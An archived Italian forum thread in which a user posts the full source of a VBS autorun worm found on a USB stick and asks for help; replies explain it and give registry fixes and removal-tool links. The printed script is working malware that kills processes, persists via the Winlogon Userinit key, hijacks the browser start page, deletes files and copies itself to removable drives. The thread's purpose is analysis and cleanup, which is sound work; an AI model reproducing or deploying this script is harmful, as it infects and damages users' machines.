PDA

View Full Version : file .vbs e autorun su chiavetta

jeanpier01
18-10-2014, 19:46
ciao a tutti
sulla mia usb ho trovato 2 file nascosti.
C'era un autorun che lancia un file .vbs.
Ho rinominato il file vbs in txt e dentro vi ho trovato questo script:


Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root
Dim strComputer,colProcessList,objWMIService,objProcess
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop


Count=Drv.DriveType

Do

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process where name='wscript.exe'")
For Each objProcess in colProcessList
if (eval(InStrRev(objProcess.Commandline,"sys.vbs"))<=0) Then
objProcess.Terminate
End if
Next

If Not Fso.FileExists(SystemDir & "\sys.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\sys.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\sys.vbs")
WriteAll.Attributes = -1
End If

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Microsoft Internet Explorer"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.hackercracker.com.np"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\sys.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
Set Delete=Fso.DeleteFile(SystemDir & "\VirusRemoval.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"
If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\sys.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\sys.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\sys.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe sys.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe sys.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe sys.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe sys.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "sys.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
sub runMe()

End Sub



Me lo sapreste decrifare?
ma soprattutto mi sapreste dire cosa devo fare per recuperare eventuali danni fatti da questo script?
grazie a tutti
Carmine01
19-10-2014, 09:05
non conosco il linguaggio ma sembra niente di serio
jeanpier01
19-10-2014, 10:11
ma comunque sono roque e dato che sul pc ho condumenti importanti, non vorrei correre rischi
jeanpier01
08-02-2015, 18:56
questo file mi sta continuando a creare problemi.
come faccio a cancellare tutte le modifiche che ha creato sul pc?
grazie
Eress
08-02-2015, 20:06
Ma hai cancellato/formattato questa usb? Comunque non sembra un file particolarmente dannoso.
jeanpier01
08-02-2015, 20:19
I problemi li sto avendo sul Pc. E poi questo file si copia sulla chiavetta ogni volta che la inserisco nel pc
bio.hazard
09-02-2015, 06:58
dunque il problema risiede nel PC, più che nella chiavetta.
fai un'accurata scansione del PC, a questo punto.
jeanpier01
09-02-2015, 07:17
L'ho fatta, ma non mi esce niente.
Mi tocca ripristinare la situazione manualmente
x_Master_x
09-02-2015, 09:22
Un "Virus" in VBS :asd:
Ti spiego io quello che succede. In pratica al primo avvio termina tutti i processi "wscript.exe" tranne quelli legati al suo file, crea una copia di se stesso nella cartella di Windows\System32 ( il nome dello script è "sys.vbs" ) ed effettua una serie di modifiche al registro, ti riporto i valori di default ( basta salvare come .reg ed eseguirlo )

Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="https://www.google.it"
"Window Title"="Microsoft Internet Explorer"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,"


La chiave che ti crea più danni di tutte è Userinit, se non sai cos'è:

Specifies the programs that Winlogon runs when a user logs on. By default, Winlogon runs Userinit.exe, which runs logon scripts, reestablishes network connections, and then starts Explorer.exe, the Windows user interface.

You can change the value of this entry to add or remove programs. For example, to have a program run before the Windows Explorer user interface starts, substitute the name of that program for Userinit.exe in the value of this entry, then include instructions in that program to start Userinit.exe. You might also want to substitute Explorer.exe for Userinit.exe if you are working offline and are not using logon scripts.

In pratica lo script si posiziona prima dell'avvio di explorer.exe, in pratica è sempre attivo. A questo punto, una volta che questo VBS è in esecuzione, cerca fra tutti i drive ( esclusa la lettera A:\ ) e mette una copia di se stesso come autorun del dispositivo, in pratica un circolo vizioso poiché quella Pendrive/HDD/etc. "rinnova" l'esecuzione del virus o lo diffonde su altri PC.

Cosa devi fare:
1) Ripristinare il registro come da valori nel TAG superiore
2) Disabilitare del tutto l'autorun con questo .reg e riavviare per confermare le modifiche

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000ff

3) Eliminare il file sys.vbs dal PC, nello specifico nella cartella di Windows\System32
4) Eliminare da ogni pendrive e dispositivi il file VBS in questione, controllali tutti visto che basta che sia presente in uno solo e il problema si ripete da zero.
5) [Opzionale] Ripristinare il valore di default dell'autorun ma visto che è veicolo di infezioni lo lascerei sempre disabilitato:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091

6) Controllare che non sia più presente nel registro alla chiave Userinit o sul PC
Unax
09-02-2015, 09:24
http://www.bleepingcomputer.com/startups/sys.vbs-23071.html

http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Autorun-EL/detailed-analysis.aspx

prova a far girare questi

https://www.sophos.com/en-us/products/free-tools/virus-removal-tool.aspx

http://www.hwupgrade.it/forum/showthread.php?t=2699460

http://altagradazione.blogspot.it/2015/01/avira-pc-cleaner.html

http://www.emsisoft.it/it/software/eek/

http://www.kaspersky.com/antivirus-removal-tool?form=1